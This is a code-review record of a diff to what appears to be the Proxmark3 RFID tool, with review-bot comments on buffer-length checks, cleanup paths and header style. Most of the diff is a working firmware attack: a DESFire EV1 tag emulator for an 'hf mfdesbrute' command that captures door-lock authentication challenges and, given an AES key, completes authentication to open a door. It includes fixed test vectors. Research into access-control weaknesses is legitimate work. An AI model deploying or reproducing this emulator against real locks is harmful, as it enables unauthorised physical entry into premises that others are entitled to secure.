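Review bot: Both new cases cast `packet->data.asBytes` to `struct p` and read `uid` and `key` from it without first checking that the host sent that many bytes, so a short packet lets `SimulateMfDesfireEv1` consume whatever was left in the receive buffer. A guard at the top of each block, `if (packet->length < sizeof(struct p)) { reply_ng(packet->cmd, PM3_EINVARG, NULL, 0); break; }`, would reject it. The two blocks are also identical apart from the command constant; stacking the labels (`case CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE:` directly above `case CMD_HF_MIFARE_EV1_OPEN_DOOR: {`) and passing `packet->cmd` as the last argument would remove the duplicated struct definition. PacketReceived starts and ends outside the hunk.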
@@ -0,0 +1,832 @@ +//----------------------------------------------------------------------------- +// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// Routines to support ISO 14443 type A. +//----------------------------------------------------------------------------- +#include "mfdessimulate.h" + +#include "string.h" +#include "proxmark3_arm.h" +#include "cmd.h" +#include "appmain.h" +#include "BigBuf.h" +#include "fpgaloader.h" +#include "ticks.h" +#include "dbprint.h" +#include "util.h" +#include "util.h" +#include "parity.h" +#include "mifareutil.h" +#include "commonutil.h" +#include "crc16.h" +#include "protocols.h" +#include "mbedtls/aes.h" +#include "desfire_crypto.h" + +#define MAX_ISO14A_TIMEOUT 524288 + +bool test_emulate_reader(uint8_t test_counter, uint8_t *receivedCmd, int *len); + +void test_verify_tag_response(uint8_t test_counter, uint8_t *sent_test_cmd, + uint8_t sent_test_cmd_len); + +//============================================================================= +// ISO 14443 Type A - Miller decoder +//============================================================================= +// Basics: +// This decoder is used when the PM3 acts as a tag. +// The reader will generate "pauses" by temporarily switching of the field. 
+// At the PM3 antenna we will therefore measure a modulated antenna voltage. +// The FPGA does a comparison with a threshold and would deliver e.g.: +// ........ 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1 ....... +// The Miller decoder needs to identify the following sequences: +// 2 (or 3) ticks pause followed by 6 (or 5) ticks unmodulated: pause at beginning - Sequence Z ("start of communication" or a "0") +// 8 ticks without a modulation: no pause - Sequence Y (a "0" or "end of communication" or "no information") +// 4 ticks unmodulated followed by 2 (or 3) ticks pause: pause in second half - Sequence X (a "1") +// Note 1: the bitstream may start at any time. We therefore need to sync. +// Note 2: the interpretation of Sequence Y and Z depends on the preceding sequence. +//----------------------------------------------------------------------------- +static tUart14a Uart; + +//----------------------------------------------------------------------------- +// Main loop of simulated tag: receive commands from reader, decide what +// response to send, and send it. +// 'hf mfdesbrute (get_challenge|open_door)' +//----------------------------------------------------------------------------- +void SimulateMfDesfireEv1(uint8_t tagType, uint16_t flags, uint8_t *uid, uint8_t *enc_key, int purpose) { + + tag_response_info_t *responses; + uint32_t cuid = 0; + uint32_t counters[3] = { 0x00, 0x00, 0x00 }; + uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd }; + uint8_t pages = 0; + + // command buffers + uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 }; + uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 }; + + // free eventually allocated BigBuf memory but keep Emulator Memory + BigBuf_free_keep_EM(); + + if (SimulateIso14443aInit(tagType, flags, uid, &responses, &cuid, counters, tearings, &pages) == false) { + BigBuf_free_keep_EM(); + reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0); + return; + } + + // We need to listen to the high-frequency, peak-detected path. 
+ iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN); + + iso14a_set_timeout(201400); // 106 * 19ms default *100? + + int len = 0; + + int retval = PM3_SUCCESS; + + int cmdsRecvd = 0; + + // for some reason the first time the reader tries to start auth it needs to fail + bool send_auth_fail = false; + + uint8_t RandA[16] = {0x00}; + // tests depend on the value below. they'll fail if it's changed and for the attack it's fine for it to be static. + uint8_t RandB[] = {0x91, 0xad, 0xb6, 0x6c, 0xe7, 0x27, 0x53, 0xf3, 0x37, 0x5f, 0xe3, 0xa0, 0x23, 0xf7, 0xce, 0xdc}; + + uint8_t iv[16] = {0x00}; + + mbedtls_aes_context ctx; + + // aes key storage + struct desfire_key dfire_key = {0}; + desfirekey_t authentication_key = &dfire_key; + + // session key storage + struct desfire_key dfire_session_key = {0}; + desfirekey_t skey = &dfire_session_key; + + struct desfire_tag dfire_tag = {0}; + desfiretag_t tag = &dfire_tag; + DESFIRE(tag)->authentication_scheme = AS_NEW; + DESFIRE(tag)->session_key = skey; + int communication_settings = CMAC_COMMAND | MDCM_MACED; + + mbedtls_aes_init(&ctx); + Desfire_aes_key_new(enc_key, authentication_key); + + // run tests with + // hf mfdesbrute open_door -t 3 -u 043c5cda986380 -k e757178e13516a4f3171bc6ea85e165a + // set g_dbglevel to DBG_DEBUG in appmain.c to see the debug output + bool run_tests = false; + int test_counter = 0; + uint8_t sent_test_cmd[128] = {0x00}; + int sent_test_cmd_len = 0; + + clear_trace(); + set_tracing(true); + LED_A_ON(); + + // main loop + bool finished = false; + while (finished == false) { + // BUTTON_PRESS check done in GetIso14443aCommandFromReader + WDT_HIT(); + + tag_response_info_t *p_response = NULL; + + if (run_tests) { + run_tests = test_emulate_reader(test_counter, receivedCmd, &len); + } else { + // Clean receive command buffer + if (GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len) == false) { + Dbprintf("Emulator stopped. 
Trace length: %d ", BigBuf_get_traceLen()); + retval = PM3_EOPABORTED; + break; + } + } + + if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP + p_response = &responses[RESP_INDEX_ATQA]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && + len == 2) { // Received request for UID (cascade 1) + p_response = &responses[RESP_INDEX_UIDC1]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && + len == 2) { // Received request for UID (cascade 2) + p_response = &responses[RESP_INDEX_UIDC2]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && + len == 2) { // Received request for UID (cascade 3) + p_response = &responses[RESP_INDEX_UIDC3]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && + len == 9) { // Received a SELECT (cascade 1) + p_response = &responses[RESP_INDEX_SAKC1]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && + len == 9) { // Received a SELECT (cascade 2) + p_response = &responses[RESP_INDEX_SAKC2]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && + len == 9) { // Received a SELECT (cascade 3) + p_response = &responses[RESP_INDEX_SAKC3]; + } else if (receivedCmd[0] == ISO14443A_CMD_PPS) { + p_response = &responses[RESP_INDEX_PPS]; + } else if (receivedCmd[0] == MIFARE_ULEV1_VERSION && len == 3 && (tagType == 2 || tagType == 7)) { + p_response = &responses[RESP_INDEX_VERSION]; + } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request + p_response = &responses[RESP_INDEX_RATS]; + } else if (receivedCmd[0] == 0x26 && len == 1) { // REQA + uint8_t r[] = {0x44, 0x03}; + EmSendCmd(r, sizeof(r)); + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x02 && receivedCmd[1] == 
0x60) { // Get Version details of card + uint8_t r[] = {0x02, 0xaf, 0x04, 0x01, 0x02, 0x12, 0x00, 0x18, 0x05, 0x28, 0x42}; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x03 && receivedCmd[1] == 0xaf && receivedCmd[2] == 0x35 && + receivedCmd[3] == 0x69) { // Get Version details of card 2 + uint8_t r[] = {0x03, 0xaf, 0x04, 0x01, 0x01, 0x02, 0x01, 0x18, 0x05, 0x64, 0x8b}; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x02 && receivedCmd[1] == 0xaf && receivedCmd[2] == 0xed && + receivedCmd[3] == 0x70) { // Get Version details of card 3 + uint8_t r[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, 0x80, + 0xce, 0xd8, 0x50, 0x59, 0x60, 0x08, + 0x19, 0xab, 0xa7 + }; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_SELECT_APP) { + // the reader will sequentially try AIDs starting with f518f0 + // it seems f518f0 can always be used, even if the real tags use a bigger AID + if (receivedCmd[2] >= 0xf0 && receivedCmd[3] == 0x18 && + receivedCmd[4] == 0xf5) { + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + + send_auth_fail = false; + } else { + // unknown AID? not sure. also covers special case of + // 5a 71 17 05 in the very beginning that always + // (needs to?) 
fail(s) + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0xa0; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_AUTH_AES) { + if (receivedCmd[2] == 0x01) { + // reader sends 03 aa 01 76 09 after selecting application 71 17 05. + // the tag needs to reply with 0xae (authentication error) after + // the reader sent its reply to this challenge + send_auth_fail = true; + uint8_t r[] = {0x03, 0xaf, 0x78, 0xd2, 0x9d, 0x9f, 0xd0, 0x17, + 0xe7, 0xca, 0x48, 0x1d, 0x8b, 0xb7, 0xd9, + 0xcb, 0x6a, 0xdd, 0x7c, 0xe0 + }; + EmSendCmd(r, sizeof(r)); + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else { + uint8_t r[20] = {0x00}; + size_t data_len = sizeof(RandB); + + r[0] = receivedCmd[0]; + r[1] = 0xaf; + + memcpy(r + 2, RandB, data_len); + + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, r + 2, data_len, MCD_SEND, + MCO_ENCYPHER); + + memcpy(iv, r + 2, 16); + + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_AUTH_AES_2) { + if (send_auth_fail) { + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0xae; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (purpose == CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE) { + DbpString("Tag challenge: "); + Dbhexdump(16, iv, false); + DbpString("Lock challenge: "); + Dbhexdump(32, receivedCmd + 2, false); + return; + } else if (purpose == CMD_HF_MIFARE_EV1_OPEN_DOOR) { + uint8_t 
both[32] = {0x00}; + size_t data_len = sizeof(both); + + memcpy(both, receivedCmd + 2, data_len); + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, both, data_len, MCD_RECEIVE, + MCO_DECYPHER); + + // save rand A for session key construction + memcpy(RandA, both, 16); + + uint8_t rotRandA[16] = {0x00}; + memcpy(rotRandA, both, 16); + rol(rotRandA, 16); + + uint8_t r[20] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0x00; + + memcpy(r + 2, rotRandA, 16); + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, r + 2, sizeof(rotRandA), + MCD_SEND, MCO_ENCYPHER); + + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_GET_FILE_INFO && + receivedCmd[2] == 0x00) { // get file info + Desfire_session_key_new(RandA, RandB, authentication_key, + DESFIRE(tag)->session_key); + + cmac_generate_subkeys(DESFIRE(tag)->session_key); + + uint8_t read_file[16] = {0x00}; + read_file[0] = 0xf5; + read_file[1] = 0x00; + read_file[2] = 0xc0; + read_file[3] = 0x48; + size_t read_file_len = 2; + mifare_cryto_postprocess_data(tag, read_file, &read_file_len, + communication_settings); + + // here the status byte (0x00) needs to be appended for the MAC + // calculation, but shouldn't still be appended when sending + uint8_t file_info[24] = {0x00}; + file_info[4] = 0x07; + size_t file_info_len = 8; + uint8_t *resp = mifare_cryto_preprocess_data(tag, file_info, + &file_info_len, 0, + communication_settings); + + uint8_t r[19] = {0x00}; + r[0] = receivedCmd[0]; + r[6] = 0x07; + memcpy(r + 9, resp + 8, 8); + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + 
receivedCmd[1] == MIFARE_EV1_READ_DATA && + receivedCmd[6] == 0x07) { + // read the contents of the file containing the UID + uint8_t get_uid[] = {0xbd, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00}; + size_t get_uid_len = sizeof(get_uid); + mifare_cryto_postprocess_data(tag, get_uid, &get_uid_len, + communication_settings); + + uint8_t uid_and_status[] = {0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, 0x80, + 0x00 + }; + uint8_t file_contents[24] = {0x00}; + memcpy(file_contents, uid_and_status, 8); + size_t file_contents_len = 8; + uint8_t *resp2 = mifare_cryto_preprocess_data(tag, file_contents, + &file_contents_len, 0, + communication_settings); + + uint8_t r[19] = {0x00}; + r[0] = receivedCmd[0]; + + memcpy(r + 2, uid_and_status, 7); // skip status byte + memcpy(r + 9, resp2 + 8, 8); // copy mac + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + sent_test_cmd_len = sizeof(r); + memcpy(sent_test_cmd, r, sent_test_cmd_len); + } + } else { + // Never seen this command before + LogTrace(receivedCmd, Uart.len, + Uart.startTime * 16 - DELAY_AIR2ARM_AS_TAG, + Uart.endTime * 16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, + true); + if (g_dbglevel >= DBG_DEBUG) { + Dbprintf("Received unknown command (len=%d):", len); + Dbhexdump(len, receivedCmd, false); + } + } + + cmdsRecvd++; + + // Send response + EmSendPrecompiledCmd(p_response); + + if (run_tests) { + if (p_response == NULL) { + test_verify_tag_response(test_counter, sent_test_cmd, + sent_test_cmd_len); + } else { + test_verify_tag_response(test_counter, p_response->response, + p_response->response_n); + } + ++test_counter; + } + } + + switch_off(); + + set_tracing(false); + BigBuf_free_keep_EM(); + + if (g_dbglevel >= DBG_EXTENDED) { + Dbprintf("-[ Num of received cmd [%d]", cmdsRecvd); + } + + // TODO canceling the simulator is broken + // after the button is pressed, the client shows "[#] Emulator stopped. 
Trace length: 850" + // but it's not possible to send any new commands using the client. + // the command prompt "[usb] pm3 --> " does not appear + reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0); +} + +// returns false if test_counter is too big to stop testing +bool test_emulate_reader(uint8_t test_counter, uint8_t *receivedCmd, int *len) { + switch (test_counter) { + // 0-5 and 13-18 can't be tested for from SimulateIso14443aTag + + // 0 REQA + // 1 ANTICOLL + // 2 SELECT_UID + // 3 ANTICOLL -2 + // 4 ANTICOLL -2 + // 5 RATS + // 6 GET VERSION + // 7 AF (Additional Frame) + // 8 AF (Additional Frame) + // 9 WRONG SELECT UID + // 10 SELECT AID 71 17 f5 + // 11 AUTH AES + // 12 READER AES CHALLENGE REPLY (TAG AE) + // 13 REQA + // 14 ANTICOLL + // 15 SELECT_UID + // 16 ANTICOLL -2 + // 17 ANTICOLL -2 + // 18 RATS + // 19 SELECT AID f0 18 f5 + // 20 AUTH AES + // 21 CHALLENGE REPLY + // 22 GET FILE 0x00 INFO + // 23 READ FILE CONTENTS + case 0: + case 13: { + // REQA + uint8_t cmd[] = {0x26}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + case 1: + case 14: { + // ANTICOLL + uint8_t cmd[] = {0x93, 0x20}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 2: + case 15: { + // SELECT_UID + uint8_t cmd[] = {0x93, 0x70, 0x88, 0x04, 0x3c, 0x5c, 0xec, 0x3d, 0x0f}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 3: + case 16: { + // ANTICOLL -2 + uint8_t cmd[] = {0x95, 0x20}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 4: + case 17: { + // ANTICOLL -2 + uint8_t cmd[] = {0x95, 0x70, 0xda, 0x98, 0x63, 0x80, 0xa1, 0xbf, 0xeb}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 5: + case 18: { + // RATS + uint8_t cmd[] = {0xe0, 0x50, 0xbc, 0xa5}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 6: { + // GET VERSION + uint8_t cmd[] = {0x02, 0x60, 0x16, 0x4e}; + *len = sizeof(cmd); + memcpy(receivedCmd, 
cmd, *len); + break; + } + + case 7: { + // AF (Additional Frame) + uint8_t cmd[] = {0x03, 0xaf, 0x35, 0x69}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 8: { + // AF (Additional Frame) + uint8_t cmd[] = {0x02, 0xaf, 0xed, 0x70}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 9: { + // WRONG SELECT UID + uint8_t cmd[] = {0x03, 0x5a, 0x71, 0x17, 0x05, 0x12, 0x41}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 10: { + // SELECT AID 71 17 f5 + uint8_t cmd[] = {0x02, 0x5a, 0x71, 0x17, 0xf5, 0xd9, 0xbd}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 11: { + // AUTH AES + uint8_t cmd[] = {0x03, 0xaa, 0x01, 0x76, 0x09}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 12: { + // READER AES CHALLENGE REPLY + uint8_t cmd[] = {0x02, 0xaf, 0x81, 0x74, 0xfc, 0xdd, 0x94, 0xb7, + 0x34, 0x17, 0xb8, 0xa9, 0xa4, 0x15, 0xdc, 0x1b, + 0x80, 0x57, 0x35, 0x20, 0x67, 0x23, 0x7a, 0x4f, + 0xe2, 0x96, 0x6b, 0x46, 0xfd, 0x24, 0x2b, 0x34, + 0xf4, 0xe5, 0x80, 0x36 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 19: { + // SELECT AID f0 18 f5 + uint8_t cmd[] = {0x02, 0x5a, 0xf0, 0x18, 0xf5, 0x21, 0x68}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 20: { + // request auth challenge + uint8_t cmd[] = {0x03, 0xaa, 0x00, 0xff, 0x18}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + // reply to tag's auth challenge + reader challenge + case 21: { + uint8_t cmd[] = {0x02, 0xaf, 0x97, 0xfe, 0x4b, 0x5d, 0xe2, 0x41, + 0x88, 0x45, 0x8d, 0x10, 0x29, 0x59, 0xb8, 0x88, + 0x93, 0x8c, 0x98, 0x8e, 0x96, 0xfb, 0x98, 0x46, + 0x9c, 0xe7, 0x42, 0x6f, 0x50, 0xf1, 0x08, 0xea, + 0xa5, 0x83, 0x8a, 0x32 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 22: { + // request file info + uint8_t cmd[] = {0x03, 0xf5, 0x00, 0xc0, 0x48}; + *len = 
sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 23: { + // request file contents (the tag's UID) + uint8_t cmd[] = {0x02, 0xbd, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, + 0x00, 0xc4, 0x15 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + default: + return false; + } + return true; +} + +void test_verify_tag_response(uint8_t test_counter, uint8_t *sent_test_cmd, + uint8_t sent_test_cmd_len) { + uint8_t expected_answer[32] = {0x00}; + size_t expected_answer_len = 0; + bool success = false; + + switch (test_counter) { + case 0: + case 13: { + uint8_t tmp[] = {0x44, 0x03}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 1: + case 14: { + uint8_t tmp[] = {0x88, 0x04, 0x3c, 0x5c, 0xec}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 2: + case 15: { + uint8_t tmp[] = {0x24, 0xd8, 0x36}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 3: + case 16: { + uint8_t tmp[] = {0xda, 0x98, 0x63, 0x80, 0xa1}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 4: + case 17: { + uint8_t tmp[] = {0x20, 0xfc, 0x70}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 5: + case 18: { + uint8_t tmp[] = {0x06, 0x75, 0x77, 0x81, 0x02, 0x80, 0x02, 0xf0}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 6: { + uint8_t tmp[] = {0x02, 0xaf, 0x04, 0x01, 0x02, 0x12, 0x00, 0x18, + 0x05, 0x28, 0x42 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 7: { + uint8_t tmp[] = {0x03, 0xaf, 0x04, 0x01, 0x01, 0x02, 0x01, 0x18, + 0x05, 0x64, 0x8b + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, 
expected_answer_len); + break; + } + + case 8: { + uint8_t tmp[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, + 0x80, 0xce, 0xd8, 0x50, 0x59, 0x60, 0x08, 0x19, + 0xab, 0xa7 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 9: { + uint8_t tmp[] = {0x03, 0xa0, 0xc2, 0x91}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 10: { + uint8_t tmp[] = {0x02, 0xa0, 0x1a, 0x88}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 11: { + // the contents don't really matter here, since the reader accepts + // anything and the tag will return AE next + // TODO: this test doesn't make sure that the CRC is correct + uint8_t tmp[] = {0x03, 0xaf}; //, 0xe8, 0x26, 0xfc, 0xe2, 0xbe, 0xdf, 0xef, 0x37, 0x83, 0xda, 0xf9, 0xdf, 0x0d, 0x82, 0x28, 0xd0, 0x18, 0xf7}; + if (memcmp(sent_test_cmd, tmp, sizeof(tmp)) == 0) { + success = true; + } + break; + } + + case 12: { + uint8_t tmp[] = {0x02, 0xae, 0x64, 0x61}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 19: { + uint8_t tmp[] = {0x02, 0x00, 0x10, 0x2d}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 20: { + uint8_t tmp[] = {0x03, 0xaf, 0x3f, 0xda, 0x93, 0x3e, 0x29, 0x53, + 0xca, 0x5e, 0x6c, 0xfb, 0xbf, 0x95, 0xd1, 0xb5, + 0x1d, 0xdf, 0x95, 0x14 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 21: { + uint8_t tmp[] = {0x02, 0x00, 0xed, 0x93, 0x55, 0xf6, 0x10, 0x97, + 0xf8, 0x7b, 0x72, 0xe8, 0x37, 0xed, 0x3f, 0xd4, + 0x8c, 0x4d, 0x40, 0x70 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 22: { + uint8_t tmp[] = {0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, + 0x00, 0xa4, 0xf8, 0x4d, 
0xb2, 0x60, 0xb0, 0x2e, + 0x47, 0xcf, 0x14 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 23: { + uint8_t tmp[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, + 0x80, 0xe6, 0x9c, 0x0f, 0xfe, 0x76, 0x25, 0x18, + 0x56, 0xa6, 0xd5 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + default: + break; + } + + // this response is different but it still works + if (test_counter == 2 || test_counter == 15) { + return; + } + if (success || + (memcmp(expected_answer, sent_test_cmd, expected_answer_len) == 0 + && sent_test_cmd_len == expected_answer_len)) { + Dbprintf("test %i successful!", test_counter); + } else { + Dbprintf("test %i resulted in an unexpected answer:", test_counter); + Dbhexdump(sent_test_cmd_len, sent_test_cmd, false); + } +} diff --git a/armsrc/mfdessimulate.h b/armsrc/mfdessimulate.h new file mode 100644 index 0000000000..4e46cf7751 --- /dev/null +++ b/armsrc/mfdessimulate.h @@ -0,0 +1,10 @@ + + +#ifndef __MFDESSIM_H +#define __MFDESSIM_H + +#include "iso14443a.h" + +void SimulateMfDesfireEv1(uint8_t tagType, uint16_t flags, uint8_t *uid, uint8_t *enc_key, int purpose); + +#endif /* __MFDESSIM_H */ diff --git a/client/CMakeLists.txt b/client/CMakeLists.txt index f6a0c9e9f5..e6440cfda2 100644 --- a/client/CMakeLists.txt +++ b/client/CMakeLists.txt @@ -285,6 +285,7 @@ set (TARGET_SOURCES ${PM3_ROOT}/client/src/cmdhflto.c ${PM3_ROOT}/client/src/cmdhfmf.c ${PM3_ROOT}/client/src/cmdhfmfdes.c + ${PM3_ROOT}/client/src/cmdhfmfdesbrute.c ${PM3_ROOT}/client/src/cmdhfmfhard.c ${PM3_ROOT}/client/src/cmdhfmfp.c ${PM3_ROOT}/client/src/cmdhfmfu.c diff --git a/client/Makefile b/client/Makefile index 4debb130f7..10f9217b21 100644 --- a/client/Makefile +++ b/client/Makefile @@ -563,6 +563,7 @@ SRCS = mifare/aiddesfire.c \ cmdhflto.c \ cmdhfmf.c \ cmdhfmfdes.c \ + cmdhfmfdesbrute.c \ cmdhfmfhard.c \ cmdhfmfu.c \ cmdhfmfp.c \ 
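Review bot: The `return;` in the CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE branch of the MIFARE_EV1_AUTH_AES_2 handler leaves SimulateMfDesfireEv1 without running `switch_off()`, `set_tracing(false)`, `BigBuf_free_keep_EM()` or any `reply_ng`, so the field and trace stay active and the client gets no completion; `break;` would fall through to the existing cleanup after the loop. Both `reply_ng(CMD_HF_MIFARE_SIMULATE, ...)` calls also answer with a different command id than the one the client in client/src/cmdhfmfdesbrute.c waits on, which may be what the TODO about cancelling describes; `reply_ng(purpose, retval, NULL, 0);` would match. The same handler copies and dumps 32 bytes from `receivedCmd + 2` without checking that `len` covers them, so a short frame is processed with leftover buffer contents. In the unknown-command branch, `LogTrace` reads the file-local `static tUart14a Uart`, which nothing in this file appears to fill, so the logged length and timestamps are presumably zero.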
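Review bot: The include guard `__MFDESSIM_H` in armsrc/mfdessimulate.h uses an identifier reserved for the implementation (leading double underscore); `MFDESSIMULATE_H__`, in the style of `CMDHFMFDESBRUTE_H__` added by this same commit, avoids that. The file also starts with two blank lines and, unlike the other files added here, carries no license header. A short comment on `SimulateMfDesfireEv1` saying that the visible callers pass a 10-byte `uid` and a 16-byte `enc_key`, and that `purpose` is one of the two new CMD_HF_MIFARE_EV1_* ids, would document the contract.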
diff --git a/client/src/cmdhf.c b/client/src/cmdhf.c
